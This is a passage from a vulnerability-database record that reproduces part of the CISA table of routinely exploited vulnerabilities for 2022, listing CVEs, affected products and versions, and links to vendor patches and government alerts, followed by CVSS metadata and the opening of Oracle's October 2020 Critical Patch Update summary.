CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0> \"Alert - Detecting Compromises relating to Citrix CVE-2019-19781\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5\n\n| \n\nBIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5\n\n| \n\n[K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://my.f5.com/manage/s/article/K52145254> \"K52145254: TMUI RCE vulnerability CVE-2020-5902\" )\n\n| \n\nCISA Alert:\n\n[Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a> \"Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows Server, Multiple Versions\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472> \"Netlogon Elevation of Privilege Vulnerability\" )\n\n| \n\nACSC Advisory:\n\n[2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Advisory 2020-016: \"Zerologon\" - Netlogon Elevation of Privilege Vulnerability \\(CVE-2020-1472\\)\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 
1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Alert - Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - update 1\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100, Build Version 10.x\n\n| \n\n[Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001> \"CONFIRMED ZERO-DAY VULNERABILITY IN THE SONICWALL SMA100 BUILD VERSION 10.X\" )\n\n| \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n 
\n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, Multiple Versions | [Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security version 10.0.9.x\n\n| \n\n[SonicWall Email Security pre-authentication administrative account creation vulnerability](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007> \"SONICWALL EMAIL SECURITY PRE-AUTHENTICATION ADMINISTRATIVE ACCOUNT 
CREATION VULNERABILITY\" )\n\n| \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207> \"Microsoft Exchange Server Security Feature Bypass Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" )\n\nACSC Alert:\n\n[Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia> \"Microsoft Exchange ProxyShell Targeting in Australia\" ) \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1\n\n| \n\n[Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"Confluence Security Advisory 2022-06-02\" )\n\n| \n\nCISA Alert:\n\n[CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog](<https://www.cisa.gov/news-events/alerts/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog> \"CISA Adds One Known Exploited Vulnerability \\(CVE-2022-26134\\) to Catalog\u202f\u202f\" )\n\nACSC Alert:\n\n[Remote code execution vulnerability present in Atlassian Confluence Server and Data Center](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence> \"Remote code execution vulnerability present in Atlassian Confluence Server and 
Data Center\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Version\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nJoint CSA:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n| \n\nMicrosoft\n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523> \"Microsoft Exchange Server Elevation of Privilege Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nJira Atlassian\n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - 
CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940> \"Confluence Server Webwork OGNL injection - CVE-2021-26084\" )\n\n| \n\nCISA Alert:\n\n[Atlassian Releases Security Updates for Confluence Server and Data Center](<https://www.cisa.gov/news-events/alerts/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data-center> \"Atlassian Releases Security Updates for Confluence Server and Data Center\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngineCorp.\n\n| \n\nManageEngine ADSelfService Plus builds up to 6113\n\n| \n\n[Security advisory - ADSelfService Plus authentication bypass vulnerability](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html> \"Security advisory - ADSelfService Plus authentication bypass vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors](<https://www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors> \"Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server 2.4.48\n\n| | \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.49\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.50\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n 
\n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall patches multiple SMA100 affected vulnerabilities](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026> \"SONICWALL PATCHES MULTIPLE SMA100 AFFECTED VULNERABILITIES\" )\n\n| \n\nACSC Alert:\n\n[Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\n_CCCS Alert:_\n\n[SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4> \"SonicWall security advisory\" ) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\n[For other affected vendors and products, see CISA's GitHub repository.](<https://github.com/cisagov/log4j-affected-db>)\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a> \"Mitigating Log4Shell and Other Log4j-Related Vulnerabilities\" )\n\n| \n\nCISA webpage:\n\n[Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n_CCCS Alert:_\n\n[Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability> \"Alert - Active exploitation of Apache Log4j vulnerability - update 7\" )\n\nACSC Advisory:\n\n[2021-007: Log4j vulnerability \u2013 advice and 
mitigations](<https://www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations> \"2021-007: Log4j vulnerability \u2013 advice and mitigations\" )\n\nACSC Publication:\n\n[Log4j: What Boards and Directors Need to Know](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know> \"Log4j: What Boards and Directors Need to Know\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j 2.15.0\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\n| \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and\n\nFortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier\n\n| \n\n[FortiOS - heap-based buffer overflow in sslvpnd](<https://www.fortiguard.com/psirt/FG-IR-22-398> \"FortiOS - heap-based buffer overflow in sslvpnd\" )\n\n| \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1)\n\n| \n\n[Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P30> \"Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release\" )\n\n| \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nNetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)\n\n| \n\n[Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP 
Content Server and SAP Web Dispatcher](<https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/> \"Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher\" )\n\n| \n\nCISA Alert:\n\n[Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)](<https://www.cisa.gov/news-events/alerts/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing> \"Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager \\(ICM\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions\n\n| \n\n[CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://spring.io/security/cve-2022-22963> \"CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\" )\n\n| \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\n| \n\n[VMware Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize 
Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nVMware Cloud Foundation (vRA), 3.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\n| \n\n[VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nWSO2 API Manager 2.2.0 and above through 4.0.0\n\nWSO2 Identity Server 5.2.0 and above through 5.11.0 \n\nWSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0\n\nWSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0\n\nWSO2 Enterprise Integrator 6.2.0 and above through 6.6.0\n\n| \n\n[WSO2 Documentation - Spaces](<https://wso2docs.atlassian.net/wiki/spaces> \"Spaces\" )\n\n| \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite, 8.8.15 and 9.0\n\n| \n\n[Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1#Security_Fixes> \"Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release\" )\n\n| \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nF5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions\n\n| \n\n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://my.f5.com/manage/s/article/K23605346> \"K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388\" )\n\n| \n\nJoint CSA:\n\n[Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a> \"Threat Actors Exploiting F5 BIG-IP CVE-2022-1388\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple 
Versions\n\n| | \n\nCISA Alert:\n\n[Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/news-events/alerts/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability> \"Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047> \"Windows Client Server Run-time Subsystem \\(CSRSS\\) Elevation of Privilege Vulnerability\" )\n\n| \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nCertain QNAP NAS running Photo Station with internet exposure\n\n| \n\n[DeadBolt Ransomware](<https://www.qnap.com/en/security-advisory/qsa-22-24> \"DeadBolt Ransomware\" )\n\n| \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.](<https://www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange> \"Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.\" ) \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| 
\n\nFortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0\n\n| \n\n[FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface](<https://www.fortiguard.com/psirt/FG-IR-22-377> \"FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface\" )\n\n| \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-03T12:00:00", "type": "ics", "title": "2022 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-13379", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-5902", "CVE-2021-20016", "CVE-2021-20021", "CVE-2021-20038", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40438", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44228", "CVE-2021-45046", 
"CVE-2022-1388", "CVE-2022-22047", "CVE-2022-22536", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22963", "CVE-2022-24682", "CVE-2022-26134", "CVE-2022-27593", "CVE-2022-27924", "CVE-2022-29464", "CVE-2022-30190", "CVE-2022-40684", "CVE-2022-41082", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2023-08-03T12:00:00", "id": "AA23-215A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-09-30T02:41:47", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n \nStarting with the October 2020 Critical Patch Update, Oracle lists updates that address vulnerabilities in third-party components which are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix. Oracle has published two versions of the October 2020 Critical Patch Update Advisory: this version of the advisory implemented the change in how non-exploitable vulnerabilities in third-party components are reported, and the \u201ctraditional\u201d advisory follows the same format as the previous advisories. The \u201ctraditional\u201d advisory is published at <https://www.oracle.com/security-alerts/cpuoct2020traditional.html>. 
\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 403 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2712240.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7285", "CVE-2015-1832", "CVE-2015-9251", 
